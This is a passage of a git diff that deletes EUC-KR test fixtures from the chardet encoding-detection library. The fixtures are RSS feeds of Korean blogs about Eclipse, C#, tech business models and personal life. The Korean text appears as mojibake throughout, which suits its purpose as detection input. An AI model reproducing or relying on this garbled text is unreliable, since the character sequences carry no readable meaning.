    -ְּ ֱ₪µµ ½ֳ½÷ְֵּ¸י Eclipse¸¦ viֳ³·³ ¾µ ¼צ ְײ±ג¸¦ ¹·¨ֱצ¸¸ ¶´ֲ ½ֳ°£ְ÷ ±׳·¡µµ ²ֿ °ֹ¸°´ (ֳ³ְ½ ¶ח¿ן ¶§ 12ֳ, ֱ׳ְּ°ם ¹·־ ´½ֳ ¶ח¿ל¸י 7ֳ ֱ₪µµ).  ±׳·¡µµ ְֿ´ ¶°ם ³×¸י ³×¸׃ֱצ µ¿ְְ÷ ְַפ ¹צ¹קְ׃ְּ ¾רְ¸´ֿ ¿¹ְ ½ֳ½÷ֵ°ת ָ®½ַַׁ ֲקְּ´ֲ ³­´.  Mac Miniµµ RAMְּ 1G¶ף¼­ ±׳·±´כ·־ ¾µ¸¸ ֱַצ¸¸, ¹ּ´ְַֿ ÷סµנ¿ְ°¡ ´ְ·ֱ¼­ְ־ֱצ, OS Xְַ Quartz ¶§¹®ְ־ֱצ ¾ֶ´ֿ¸י SWTְַ OS X ֶקֳֶ ¶§¹®ְ־ֱצ´ֲ ¸פ¶ףµµ GUIְַ ְְ´ה¼׃µµ´ֲ ֱ» ´ה´הַ¾ת´.
    -
    -ֱַ·־±׳·¡¹ײְ» 8 bit CPU¿¡¼­÷־ֵֽ ½ְֳַ°ם ְ׃÷£µנµו ½ֳ½÷ֵ °³¹µµ ²ֿ ַ¾ת±ג ¶§¹®¿¡ ַׁµ¿¾ְָ÷ ַׁ ¹ְֶּ®, ַׁ »חְֵּ¬ְּ¶ףµµ ְֱּ´ֲ °ְּֽ ½ְ°ְּ µַ¾מ ¿הֱעְַ bloatware¸¦ ְֲ» ¼צ ¾ר¾תֱצ¸¸, ÷¸´ ֵ« °ֱ¡¿¡¼­ ÷¸¸י °ב±¹ °זֱ¦ ³ם¸®¿¡ µ¶ף compromizeַׂ ¼צ ¹¿¡ ¾ר´ֲ °ֽ.  ֱ¡ֱ¡ ÷¹ְגַ״ֱ®°¡´ֲ ¿ה±¸»חַ׳ְ» ¸¸ֱ·ַֿ±ג ְ§ַ״¼± ָ¿ְ²ְּ ֱ» ¶³¾מֱצ´ץ¶ףµµ ´ץ ֳ»ףָ­µָ ·¹÷§·־ °³¹ַׂ ¼צ ¹¿¡ ¾ר°ם »ח¿כְµיµµ °¡²¾¿ְ÷ ֳײ½ֵ »ח¾חְַ ַֿµו¿‏¾מ·־ ֲׁ¾ֶ°¥ ¼צ ¹¿¡ ¾רְ» °ֽ °°´. - ]]> -
    - ¹ּ÷׀·ש - Sun, 20 Nov 2005 13:03:14 GMT -
    - - <![CDATA[ ָµי¾ת´ר ַׁ ֱײ... ]]> - http://yunho.egloos.com/1903837 - - -
    -- ¿ש¿הְֿ: ְּ°¡ ֱ» ½ֳ·ֱ ִ¡°ת¿¡ °¬´°¡ »ח¶´ֿ »ּ°ם ¶ַ ´¸¥ ְּµµ ִ¡·ב. ְַ»ח°¡ "ְװ¾ְָּ ±±¥³׳¿ה."¶ף°ם ַ´.
    -- ָ­¿הְֿ: ֱצ°©ְ» ֱ‎¿¡ µ־°ם ֳג±... ְּ·± ½ַ¼צ´ֲ ¸מ ³ג¿¡ ַׁ¹רµµ ְ ¾ַָֿ´ֲµ¥
    -- ¼צ¿הְֿ: °¨±ג ¸צ»לְּ ¿װ´. ´צ÷׀¿¡ ¾ף¸¶ ְ ½ְֳַׁ °סֱַ ·¹½¼ְ» ¸ר°¬´.
    -- ¸ס¿הְֿ: ְת³ב ¶§ ֲק ¹®ְ» ´´°¡ »ץ³¢ ¼ױ°¡¶פְ» ½ַֹֿ°װ ֲצ¾ת´. ¼ױֵיְּ ÷ֱת °ֽ °°±גµµ ַֿ°ם...
    -- ±¿הְֿ: ´ִ£ ¼ױ°¡¶פ ¶§¹®¿¡ ֳג±±ז¿¡ ÷´¿ר¿¡ °¡·ֱ ַֿ´ֿ ¶ַ ֱצ°©ְ» µ־°ם ¿ֲ °ְֽ» ¹°. °ב±¹ µ¿·ב¿¡°װ µ· ÷פ·ֱ¼­ °¡±ה ֱַצ¸¸. ¼ױ°¡¶פ ¶§¹®¿¡ °סֱַ ·¹½¼ ¶ַ »©¸װ°ם.
    -- ֵה¿הְֿ: ְּ¹ר ֱײ´ֲ ¾ֶ¹«·¡µµ ¾ַָ®¸®´ֿ ֱ‎¿¡¼­ ַ« ½¬±ג³× ַ״¾°´°ם »‎°¢ַ´°¡ ְּ¸¶ֶ®¿¡ µי·¯ ½÷ֵ¸¿צֱמ ¿¡ַַ¼ׂµו 3 DVD¸¦ »ע´ֲµ¥... ֱ‎¿¡ ¿ֽ¼­ ÷¸´ֿ ÷ְֵץ¿¡ ¾ר´. ְּ¸¶ֶ®·־ ְָ­ַ״÷ֱµµ ¿ְ¸®¹«ֱ...
    -
    -¾׳¶«ַׁ °ְּֽ¶ף°ם »‎°¢ַֿ°ן ְײֱצ¸¸ ְּ¹ר ֱײ·־ ³¡³×·ֱ³×?
    -
    -¹°·׀ ְּ¹ר ֱײ¿¡ ³×» ְְּֿ ְֿ¾מ³­ °ֽ°ת ´ְ½ ֱײ¿¡ ³×» ְְּֿ ¶ַ ְֿ¾מ³×´ֲ °ְֽ÷ ָ®·ְְ¸·־ µ¶¸³ְְּ±ה ֱַֿצ¸¸... ´ְ½ ֱײ¿¡ ָ¸»ח¿¡¼­ ֱ¿הַׁ ְֿµיְּ ¸¹ְ÷µ¥ ְּ¹ר ֱײ ¾׳¶«ַׁ ´צ÷׀¿¡ ´ְ½ ֱײ´ֲ ְ ַ®¸®ֱצ ¾ְ»±מ ְ÷±ָק ±ג´כַ״÷»´. - ]]> -
    - ±גֵ¸ - Sat, 5 Nov 2005 11:03:44 GMT -
    - - <![CDATA[ ְ¥ְּ ´¸¥ ½ְִ¸·־ ¸¸µי¾מֱ³´¸י? ]]> - http://yunho.egloos.com/1903556 - - ¸¸¾א ְ¥ְּ 15³גְ Tim Berners-Lee¿¡ ְַַ״ ¸¸µי¾מֱצֱצ ¾°ם ¼¼°טֱצְְח»ך±ַ±ג±¸(WIPO)³× µנֱמ´ֿ¿¡ ְַַ״ ¸¸µי¾מֱ³´¸י ֱצ±ְַ ְ¥°ת ¾מ¶»°װ ´¶תְ»±מ?
    -
    -¸נ¸£±הַ״µµ ֱצ±ְַ ְ¥¸¸ֶ´ ¼÷°רְְֱּצµµ, ±׳ ±¸ֱ¶°¡ °£´ֱַֿצµµ, ֱ₪÷¸°¡ ַ³÷־ֱַֿצµµ ¾¾ְׂ» °ְּֽ´. ¾ֶ¸¶ ¿¹ְְַ PC ֵכ½ְֵּ³× ֱצ±ְַ ¹«¼± ְ־ֵֽ³ְ» ֱ» ´ץ ´אֱצ ¾¾ְׂ»±מ? ±¸±µµ, Wikipediaµµ, ÷ם·־±׳µµ ¾ר¾תְ» °ְּֽ´.
    -
    -ַ׀±³¿ֽ ֱ₪÷־ֳג¿¬¿¬±¸¼ׂ¿¡ ¿ְ·¡ ְײ´°¡ ָ¸»ח·־ ¿ֵ±ג¸י¼­ ¹°·׀ ¿©·¯°¡ֱצ°¡ ´¶ףֱת °ְּֽ¶ף°ם »‎°¢ַֿ°ם ְײ¾תֱצ¸¸, °¡ְו ֱ¿הַׁ ֲקְּ´ֲ ¿ל¸®ָ¸»ח¿¡ ֵץְַׁ ¿±¹ְַ ַׁ venture capitalist·־ ÷־ֵֽ µיְ÷, ±ג¼תְּ »ף¾קְְ¸·־ ¼÷°רַֿ±ג ְ§ַׁ ´ְ½ְַ ¼¼°¡ֱצ ֱ¶°ְַ¸·־ ¿ה¾אµָ´:
    -
    - 1. ±ג¼תְּ ±¸ַצ °¡´ַֹׂ °ֽ
    - 2. ±׳ ±ג¼תְ» ¿רַֿ´ֲ »ח¿כְ°¡ ְײְ» °ֽ
    - 3. BM(Business Model)ְּ ְײְ» °ֽ
    -
    -1, 2¹ר¿¡ ´כַ״¼­´ֲ ´©±¸³× ´ח¿¬ַֿ´°ם »‎°¢ַֿ°ֱצ¸¸ (ַ׀±³³× ¿¬±¸¼ׂ¿¡¼± 1¹ר¸¸ְ¸·־µµ ¾מ¶² ±ג¼תְ» °³¹ַ״÷¸´ֲ °ז¿לµµ ְײֱצ¸¸) 3¹ר ֱ¶°ְַ÷ ָ¸»ח¿¡¼­ »ח¾ק°טָ¹¿¡ ֱקֱ¢ °¿©ַ״÷¸ֱצ ¾ְ÷ ¿£ֱצ´ֿ¾מ¶ף¸י "±׳°ֵ¾ ¹¹ ´כֳז ¾מ¶»°װ µַ°ֱצ"ַֿ´ֲ ¿µ¿×¿¡ ¼׃ַׁ´. ֱַֿצ¸¸ ¸¹ְ÷ ±ג¼תְּ commodityָ­µַ°ם °זֱ¦ְַ ¼¼°טָ­°¡ ֱרַאµַ¸י¼­ ½ֱַתְְ¸·׀ 3¹רְּ °¡ְו ֳזֱ·½ֳֵ°±ג ¾מ·ֱ¿מ °ז¿ל°¡ ¸¹ְ÷ °ֽ °°´. ַׁ ֱַ·־ֱ§ֶ®ְַ ֱַ·־±׳·¡¸׃ְַ ¼צ°¡ ¸¹ְ» ¼צ·ֿ ְ־´ח »‎»ך¼÷ְּ ¶³¾מֱר´´ֲ °ְֽ÷ ְ ¾ֻ·ֱֱר ¾ך±גֱצ¸¸ ָ¸»חְּ°ַ ֱ₪÷־ְּ°ַ ´ֳ¼ְּ°ַ ¿©·¯ ֱײֳ¼°¡ °¿©ַֿ´ֲ ¸נµח ְֿ - ַֿ³×ְַ ֱַ·־ֱ§ֶ®ְּ°ַ ¿¬µ¿ ±װ°ְּ³× ±ג¼ת ַ¥ֱ״ְּ°ַ °£¿¡ - ְ÷ ¼­·־ ְװְוְּ ´¸¥ ֱײֳ¼ְַ ¼צ¿¡ µ¶ף ±גַֿ ±¼צְְ¸·־ °ב°ת¹°ְּ ÷¹ְגַ״ֱצ°ם, ֱרַא ¼׃µµ°¡ ´ץµ®ֱצ°ם ַ׳»ף ±׳·¸ֱצ´ֲ ¾ֱצ¸¸ ַ°ֱת ¶ַַׁ ¶³¾מֱצ´ֲ °ז¿ל°¡ ¸¹ְ÷ °ֽ °°´.
    -
    -¸¸¾א ְ¥ְּ ÷ס»ף¾קְְ־ ¿¬±¸¼ׂ¿¡¼­ ¹¸םµַ°ם ÷ס»ף¾קְְ¸·־ ¸ױְת ֱֶ®³×°¡ֱצ ¾¾ׂ´¸י ַ¿¬ְְ¸·־ ¿©·¯ ָ¸»ח¿ֽ ֱ₪÷־±ג° µמְּ ±׳ ַ¥ֱ״ָ­¿¡ °¿©ַֿ°װ µַ¾תְ» °ְּֽ°ם ¾ֶ¸¶µµ DRM°ת ְתְ±ַ, ¼ׂ¾׳ °בֱ¦, ֱַ¶ףְּ¹צ½ֳ, ¼÷ְ־ ֱִֵֶ®¿¡ ´כַׁ ±װֱ¦¿ֽ °°ְ÷ ¸¹ְ÷ ְּ½´ »׃¸¸ ¾ֶ´ֿ¶ף °¢ OS ¾קֳ¼, ¼ֲֵ¾ ¹½÷³× ְּµ¿ֵכ½ֵ ¾ק°ט¿¡¼­µµ ְ½ְֵַ ְַּ״°°ט¿¡ µ¶ף ¿ה±¸»חַ׳ְ» ¹¿µַֿ·ֱ ַֿ¸י¼­ ½ֳ°£ְּ °ֹ¸®´ֲ µ¿¾ָ ְ¢¸¸ַׁ ´כַ׀ °·ֳ ַ׀°תְַ ¿¬±¸½ַ¸¶´ HTTP÷¸´ ָ־¾ְ ´ץ ֱ₪±³ַֿ°ם ָ¿ְ²ְְ־ ֱַֿצ¸¸ ´ץ ÷¹ְגַׁ ¿©·¯ ֱַ·־ֵהִ°ת ActiveX, Java Applet, AJAX³× XAML ¸רֱצ ¾ְ÷ executable content¿¡ ´כַׁ ֱ¦¾ְָּ °ט¼׃ ³×¿ֽ¼­ ¾ֶ¸¶ ¾ֱֶקµµ ¼¼°טְְ־ ֵכְֿ¾ָ¿¡ ַױְֱַַֿצ ¸רַֿ°ם ְײֱצ ¾¾ְׂ»±מ? ַצְחְַ ¹«¼± ְ־ֵֽ³ְּ³× ָ¨ ¿ְֵה¸ְּ¼ַ°ת °°ְ÷ ÷׀¾¸¦ ÷¸¸י ³¹« ְֲֿן÷־ֵֽ »ף¾ק¼÷, ֶ¯ָק ¼­·־ ´¸¥ ֱײֳ¼°£ְַ BM ¹®ֱ¦°¡ °ֹ¸²µ¹ְּ µַ¾מ ´ץ ֵ« ְִֶּ°¡ ַ¼÷µַ´ֲ °ְּֽ ְתַ״µַ°ם ְײ´ֲ °ְֽ» ÷¼ ¼צ ְײ´. ´כ±ג¾ק ֱ½ְַֹ °זֱ¦ ¼÷ְוְּ ֱ₪÷־¿¡ ´ץ ְֽ¼קַֿ°ם ¿¹ֳר °¡´ַֹֿ±ג¿¡ ְּ·¯ַׁ ÷׀¾ְַ ֱ₪÷־ ֱ₪ֳ¥µµ ´כ±ג¾ק ְ§ֱײ·־ ְּ·ח¾מֱצ´ֲ °ְֽ» ÷¼ ¼צ ְײֱצ¸¸ ֱרֱ₪ְ¸·־ ְ¥°ת °°ְּ disruptiveַׁ ±ג¼תְּ ³×¿ְ´ֲ °ְֽ» ÷¸·ֱ¸י ְ־ֵֽ³°ת ְ¥ְּ ±׳·¨µםְּ ÷ס»ף¾קְְ־ °³ְ־ְּ³× ¾ֱֶײ ְְ÷ ָ¸»חµיְּ ´כ±ג¾קְּ³× ±גµז±ְַ» °¡ֱר ֱײֳ¼¿ְַֽ ±ז°ם ±ה ַש»ף ¾רְּ ¾ְֶּµנ¾מ¿ֽ ±ג¼ת¸¸ְ¸·־ »ץ·־¿מ °ְֽ» ³»³ץְ» ¼צ ְײ´ֲ ָ¯°זְּ ֱ¶¼÷µַ¾מ¾ ַׂ °ְּֽ´. - ]]> -
    - IT - Sat, 5 Nov 2005 08:20:01 GMT -
    - - <![CDATA[ C#¿¡ ´כַׁ Hejlsbergְַ ְ־ֵֽ÷ה ]]> - http://yunho.egloos.com/1863888 - - O'Reilly »חְֶּ®¿¡ ¿ֳ¶ף¿ֲ C#¿¡ ´כַׁ Hejlsberg¿ְַֽ ְ־ֵֽ÷ה. Hejlsberg(¾מ¶»°װ ְ׀´ֲ°ֱֵצ?)´ֲ ¹°·׀ C#ְַ chief architectְּ°ם ±׳ ְ¯¸םַׁ ֵֽ÷¸ ִֶ½÷ִ®°ת µ¨ְְִֶּ» °³¹ְַ¸¸ח .NET¿¡¼­µµ ְְֱֳ־ ¿×ְַׂ» ַׁ ְ־¹°. Channel 9¿¡ ¿ֳ¶ף¿ֲ LINQ¿¡ ´כַׁ ֳײ± ְ־ֵֽ÷ה ÷סµנ¿ְ¸¦ ÷¸¸י ¼±ְװ°ְ» °®°ם ְײ¾מ¼­ְ־ֱצ´ֲ ¸פ¶ףµµ ְ־»ף¿¡¼­÷־ֵֽ ֳµְח¼÷ְּ ¹ט¾מ³×¿ְ´ֲ µם ַֿ´.
    -
    -C#¿¡ ´כַׁ ְ־ֵֽ÷ה¸¦ ÷¸¸י ֱַ·־±׳·¡¹ײ ¾נ¾מ¿¡ ´כַׁ ±׳ְַ ֳ¶ַ׀ְ» ´כֳז ÷¼ ¼צ ְײ´ֲµ¥, ³×´ֲ ¾ֱֶק C#ְ¸·־ ÷»°ְְ־ ֱַ·־±׳·¡¹ײְ» ַ״÷» ְְ÷ ¾רֱצ¸¸ Java¸¦ ½ב÷» °זַט¿¡¼­ ¾ֻ°ם ְײ´ֲ ¹®ֱ¦ֱ¡µיְ» C#¿¡¼­ ַ״°בַֿ´ֲ °ְֽ» ÷¸¸י, ¶ַ C# 2.0¿¡¼­ µµְװµָ °­·ֲַׁ ±ג´ֹµיְּ LINQ¿¡¼­ ¾מ¶»°װ ָ°¿כµַ´ֱֲצ¸¦ ÷¸¸י ¿×½ֳ ±׳ְַ ֳ¶ַ׀¿¡ °ם°³°¡ ²פ´צ¿©ֱצֱצ ¾ְ» ¼צ ¾ר´.
    -
    -Java°¡ ±׳µ¿¾ָ ¶ףְּ÷ך·¯¸®¸¦ ¸¹ְּ ָ®ְוַֿ¸י¼­µµ VMְּ³× ¹ְֶּ®ִµו ·¹÷§ְַ ָ£ָ¯¼÷ְ» ³מ¶ף¿ן ֱ₪µµ·־ ¾ֱָ₪ְְ¸·־ ְ¯ֱצַ״¿ֲ °ְּֽ Javaְַ °¡ְו ֵ« ְוֱ¡ ֱ ַֿ³×ְּ±ה ֱַֿצ¸¸, delegation¿¡ ´כַׁ Sunְַ ֱײְוְ» ְ׀´÷¸¸י C#/.NETְּ ¾ֶ´ֿ¾ת´¸י ֱצ±ֲכ Javaµµ delegationְּ µµְװµַ¾תְ» °ְֽ» ±°ֵ°¡ ¾אַׁ ³ם¸®·־ °םֱ‎÷־¸®°ם ְײ´ֲ °ֽ ¾ֶ´ׁ°¡ ַֿ´ֲ »‎°¢ְּ µח´.
    -
    -C#°ת .NETְ÷ Hejlsberg°¡ MS JVM°ת WFC¸¦ °³¹ַׁ °זַטְ» ¹ְֱֵ¸·־ ַ±ג¿¡ Javaְַ ´ֱ¡°ת ַׁ°ט¸¦ ³¹«³×µµ ְ ¾ֻ°ם ְּ¸¦ ¸נµ־ ¸ֵ¿ל cleverַׁ ¹ז¹‎ְ¸·־ ÷¸¿ַֿֿ°ם ְײ´ֲ °ְֽ¸·־ ÷¸ְ־´. ¹°·׀ ִָ¹ֱײְ°¡ ְּ·± ¸י¿¡¼­ ְ¯¸®ַׂ ¼צ ¹¿¡ ¾רֱצ¸¸ MSְַ ¼ק¸םְ ַׁ°טְ־ ¾ק°טְַ ¹°¨°ת ÷ׂ½ֵ, ±׳¸®°ם ¾ֱֶק ֳז÷׀ָק ¼ק¼÷µֱַצ ¾ְ÷ VMְַ ¿ֿ¼÷µµ¸¦ ÷¸¸י C#/.NETְּ ֱצ± ½ֱֳ¡¿¡¼­ ²ְ ְ¯¸®ַׁ °ֽ¸¸ְ÷ ¾ֶ´ׁ µםַֿ´. ±׳·¸±ג´ֲ ַ״µµ 10³ג ְ MS°¡ ³°¾ֶ÷ֱר Win32¿ֽ x86 ָ£ָ¯¼÷¿¡ ¹­¿© ְײְ» ¶§ Sun¿¡¼­ Java·־ ִ¡°ם ³×¿ֲ °ֳֽ³·³, Sunְּ Javaְַ ָ£ָ¯¼÷°ת WORA (Write Once, Run Anywhere)¿¡ ¹­¿© ְײְ» ¶§ MS¿¡¼­ .NET, Avalonµמְַ °­·ֲַׁ ±ג¼תְ» ֶקַװַֿ´ֲ WinFXְ» ³»³ץ´ֲ °ְֽ» ÷¸¸י ְװְו¸¸ ¼­·־ ¹²ן ¿×»חְַ ¹÷¹ְּ ¾ֶ´ׂ ¼צ ¾ר´.
    - - ]]> -
    - ֱַ·־±׳·¡¹ײ - Sun, 23 Oct 2005 13:20:39 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/zangsalang.egloos.com.xml b/chardet/tests/EUC-KR/zangsalang.egloos.com.xml deleted file mode 100644 index dea8f9a..0000000 --- a/chardet/tests/EUC-KR/zangsalang.egloos.com.xml +++ /dev/null @@ -1,213 +0,0 @@ - - - - - ְו»ח¶ְַ ¼¼»ף ְּ¾±ג---** - http://zangsalang.egloos.com - ¼צ´..¼צ´..¼צ´.. ¼¼»ף¿¡ ַׂ ¾ך±ג°¡ ³¹« ¸¹¾ֶ!!! - ko - Sun, 9 Nov 2003 16:50:47 GMT - - ְו»ח¶ְַ ¼¼»ף ְּ¾±ג---** - http://pds2.egloos.com/logo/1/200512/30/55/a0005655.jpg - http://zangsalang.egloos.com - 80 - 61 - ¼צ´..¼צ´..¼צ´.. ¼¼»ף¿¡ ַׂ ¾ך±ג°¡ ³¹« ¸¹¾ֶ!!! - - - <![CDATA[ »ץַ״ ÷¹µי ¸¸¶¥ְ¸·־ ¹ְ¸¼ֵ¿ה... ]]> - http://zangsalang.egloos.com/1219818 - - -¾ֱֶקµµ ְת¸¦ ֳ£¾ֶ ֱײ½ֳ´ֲ ¿©·¯÷׀µי²² ³¹«³¹« °¨»חַֿ´´ֲ ¸»¾¸ְ»..ְַױ´ֿ´.
    -
    -ְֱּ¨ ´½ֳ ¿ֳ ¼צ ְײְ» °ֽ °°¾ֶ¼­...₪ׁ₪ׁ;;;
    -
    -ְו»ח¶ְַ ÷¯¸ם...
    -
    -ְֿ¶§¹®¿¡ ¹÷¼­ ַׁµ¿¾ָ ¹זִ¡ַ´ר ³» ֱ‎¿¡ ¿ְ·£¸¸¿¡ µי·¶´ץ´ֿ ³¸¼±ְְַּ µ¡±ְּ???
    -÷°°ֵ ¾ֶ´ֿ¶ף¸י ÷°°ֵ ¾ֶ´ׁ ³»¿כְּ¿´ֱצ¸¸...ְת¿¡°װ´ֲ ֳז°ְּ¾ת´ה´ֿ´.
    -ִ¿´¶ץ ¿ְַ״°¡ ְײ¾ת³×÷»µ¥ ֱ¦°װ ÷¯¸םַׂ ±גָ¸µµ ֱײֱצ ¾°ם ¹«¸םְ¸·־ µ¡±ְ» ³²±ג¼ֵ¼­...
    -´ץ±÷´³× ±׳°װ ֱ¦ ְֿ°ת °·ְֳּ µַ¾מְײ¾ת´רֱצ¶ף ¸¾ °ם»‎ְּ ´ץ ִַ½ְ´ֿ´.
    -ְּ±·ח¿¡ µי¾מ ¿ְ´ֲ°װ µ־·ֱ¿¾תֱׂ...
    -´©±÷°¡°¡ ³×¸¦ ¿ְַ״ַֿ¿© ³»°װ µ¹ְ» ´רֱ³´ֲµ¥ ³×´ֲ ¸·ְ» ±גָ¸µµ ¾רְּ
    -°ם½÷¶ץָק µ¹ְ» ¸ֲ°ם ְײ´ֲ ±ג÷׀...±׳°װ ֲ...¹«¼·´ץ±÷¿ה..
    -ֳײ¼ַׁׂ ³»°װµµ ¸»ְ» ַׂ ±גָ¸¸¦ ֱײ½ֱֳצ...
    -ַֿ¿©°£ ±׳·¨½ְ´ֿ´.
    -
    -°ב±¹ ´¸¥ °ק¿¡ µױֱצ¸¦ ֶ²°ם ¶ַ ´¸¥ ¸¸³²µיְ» °¡ֱ³´ֲµ¥
    -¿ל¿¬ֲת°װ ְת¸¦ ֳ£¾ֶ ֱײ¼ּ´ר ´±׳¸²ְ´װְ» ¸¸³×°װ µַ¾ת³׳¿ה..
    -´±׳¸²ְ´װְ÷ ¾ֱֶקµµ ְּ±·ח¸¦ ַֿ½ֳ´ץ±÷¿ה.
    -
    -ְּ¾±גְןְּ°¡ ְװµµ ±ֱת °ֵ¸®°ם ¼ױµµ ±ֱת °ֵ¸®°ם...^^;;;
    -2006³ג ´½ֳ ְּ¾±ג¸¦ µי·ֱµו¸³´ֿ´...
    -
    -¸נµ־µי »ץַ״ ÷¹ ¸¶¾ֶ´ֿ ¹ְ¸¼ֵ¿ה...
    - - ]]> -
    - ¹ּ÷׀·ש - Fri, 30 Dec 2005 11:14:49 GMT -
    - - <![CDATA[ ÷¯ַֿ´ֲ ¾ְֶּµי.. ]]> - http://zangsalang.egloos.com/786139 - -
    -ֱק¾ק¶§¹®¿¡ °°ְ÷ °קְ» ¿©·¯¹ר °¥ °ז¿ל°¡ ¸¹½ְ´ֿ´.
    -µ¶זַׁ ³×¶ף´ֲ ¾נֱ¦ °¡µµ ¿©¸§ְּ¶ף´ֲ »‎°¢ְ» ¸¹ְּ ֱַֿצ¸¸
    -ְּ·± °קµµ ְ÷±ָק °טְ‎ְַ ֶ¯¼÷µיְּ ְײ¾מ¼­
    -°¥ ¶§¸¶´ ֱ¶±¾¿ ´¸¥ ´ְ³¦ְ» ¹ֱׂ.
    -
    -±׳·±µ¥....
    -ֱ¦°¡ ´ֳ ´´ֿ´ֲ °קְ÷ ְ¯¸ם °±₪ֱצְװ´ֿ´.
    -¼¼»ף »ח¶קµיְַ ְּ¸סְּ ֱ‎ֱµַ¸י¼­ ¸¹ְ÷ »ח¶קµיְּ ¸נְּ´÷¸´ֿ
    -ְּ·± °קְ÷ ³¯ְּ °¥ ¼צ·ֿ ÷¯ָ­ְַ ֶרְּ ִ¿ֱצ°װ µָ´ה´ֿ´.
    -ָ£ֵ°ת ְ¯ָן°¡°¡ ¸¹ְּ µי¾מ¼­°ם
    -÷ף°ןַׁ ¾ְֶּµיְּ »‎°ט¸¦ ְ§ַ״ °±₪»ףַ°ְּ µַ°ם...
    -
    -»חֱרְ÷ ִ¯÷¸µנ¾ֶ ¾¾¿¥¸³ְַ ¹¶ףְָּ£¼צ¿¡¼­
    -°±₪°´ְ» »ף´כ·־ ֲֶָמ¸¦ ִֶ´ֲ ¾ְֶּµיְװ´ֿ´.
    -ֳ· °¥¶§¸¸ַ״µµ ±׳ְת 1´·¯! 1´·¯!¸¦ ¿ִ¡´ר ¾ְֶּµיְּ¿´´ֲµ¥
    -¿הֱעְ÷ ֶַ¸ְֵ·«ְּ »ף´חָק °ר°ְְּ µַ¾ת¾מ¿ה.
    -°ֵ±ג´°¡ ַׁ±¹ְ־ ַצֱצ °¡ְּµוµיְּ ַׁ±¹³כ·¡¸¦ °¡¸£ֳִ¼­ ÷־¸£°װַׁ´ה´ֿ´.
    -'»ךֵה³¢''¿ְ!ַ½ֲִ¸®¾ֶ''ַ׀±³ֱ¾ְּ' µמְ־µ¥
    -ַׁ±¹ְ־ °±₪°´µי¸¸ ÷¸¸י ´·ֱ ¿ֽ¼­
    -³כ·¡¸¦ ÷־¸£´ֲµ¥....
    -ְַׁ´°םַ״¾ֱַׂצ ¾ֵָ¸±ץ´°םַ״¾ֱַׂצ..
    -¹ְ½µµ ¾¼÷ַׁ ¾ְֶּµיְַ ³כ·¡¿¡ °±₪°´µיְ÷ ½ֵ±גַֿ°ם ±ֽ¿±´°ם
    -ֲֶָמ¸¦ ¸¶±¸ »חֱײֱצ¸¸
    -ְּ °ְּֽ ְּ ¾ְֶּµיְ» ֱ¦´כ·־ ֱצִׁ ֱײ´ֲ °ְֽ÷ ¾ֶ´ֵׂµ¥...
    -
    -±׳·¡¼­ ±׳·±ֱצ ¿הֱע ÷־ֲ½ ְ¯´ֿ¼¼ֱַ ¼÷±ְ» ¸¹ְּ ³»°ם ְײ½ְ´ֿ´.
    -ְְ÷ µ·ְֱּצ¸¸ ֱ¦´כ·־ ֱ» ¾²¿©ֱ³ְ¸¸י ֱֱ°³׳¿ה..
    - - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Wed, 3 Nov 2004 12:09:26 GMT -
    - - <![CDATA[ ָ²±ְ¸·־ ¸¸µח ÷ׂ»ף ]]> - http://zangsalang.egloos.com/625374 - - ֱ¦ְ³גְ־°¡...ֲֵ±¹ְַ ִֵֶ¸¾·־ ֳגְוְ» °¬¾תֱצ¿ה. ±׳ ¶§ ¿ל¸®ְְֶּ ¿צ³« ְח¹ְּײ°ם ִ£ְ‎ַׁ ¼ױ´װµי¸¸ ְײ´ֱֲצ¶ף ¹÷°¡ ²ְ ´ץַ״ µו¸®°ם ½ֽ¾מ¼­ °¡ְּµו¸¦ ²¿½ֳ°ם, ְ¸¸£°ם, ַש¹ַֿ°ם...¹¹^_______^**±׳·¸°װַ״¼­ ְֱֿ₪ְ» ַׁ ±÷µ¥ ´ץ µ¹°װ µַ¾ת¾מ¿ה. ±׳°װ ¹·־ ְּ °קְ־µ¥ ±׳ ¶§¸¸ַ״µµ ¾ֱֶק ´ְוְּ ¿ְָֿק ³¡³×ֱצ ¾¾ׂ¾ת°ם ְּ¸§µµ ±׳³ֹ ָ²±÷ׂ»ףְּ¶ף°ם ÷ׂ·¶ֱצ¿ה. °נ °±₪ֱצ·־ °³ְו µֹ ¿¹ֱ₪ְּ¿´´ֲµ¥ ַׁ±¹´ֳ¼ְַ ְֱֿ₪¿¡´ֲ ¾ֱֶק±מֱצµµ µי¾מ°¡ֱצ´ֲ ¾°םְײ³׳¿ה.
    -¸» ±׳´כ·־ ֱ₪¸» ָ²± ÷ׂ»ףְװ´ֿ´. ְ‎÷®ְַ ±ן¾ֱֶצ¸¥ ¸י¿¡ ÷ׂ»ףְַ ֲֵַ¸¦ ±׳·ֱ¼­ ָ¨ְ» ִֶ°ם ±׳ ָ¨ »חְּ·־ ±¹°ְ» ÷־¾מ ¸¸µי¾ת°ֵµח¿ה(ֱ₪ָ®ַֿ°װ ¸¸µח ¹ז¹‎ְ÷?? ±׳·¸´°ם µי¾ת¾מ¿ה^^). ְ‎÷®ְַ ³פְּ¿ֽ ÷ׂ»ףְַ ³פְּ´ֲ ֱ₪ָ®ַֿ°װ ¾ֻ ¼צ ¾רֱצ¸¸ »חֱרְ¸·־ ÷¸±ג¿¡µµ ´כ´ַ״ ÷¸ְֱּצ¿ה. ´ץ ´כ´ַׁ °ְֽ÷ ְּ ÷ׂ»ףְ» ֱצֵ°´ֲ »ח¶קµיְּ¿´¾מ¿ה. ±÷ְ־µיְּ ֱצֵ°°ֵµח¿ה. °ֽµ־ ¹«ְוְ» ַ״¼­¿ה. ±׳°ֹ ÷¸´ֿ ְת ÷ׂ»ףְַ ±ְּ ֱ₪¸» ±ְ־°¡ַֿ´ֲ ±ֳ±ֱץְ÷ ¾ָ »‎±גµ¥¿ה.
    -¼¼»ף¿¡´ֲ ´כ´ַׁ ¹ְֿ½µיְּ ֲ ¸¹¾ֶ¿ה. ¹ְֿ½ְ» °¡ֱר ְ־°£µיְ÷ °בִ µ־·ֱ¿מ °ְּֽ ¾רְ» °ֽ °°ְ÷µ¥ ±׳°װ ֱ» »¶װ¾מֱצ¸י ¹®ֱ¦°¡ µַ°ֱׂ...... - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Wed, 14 Jul 2004 08:49:05 GMT -
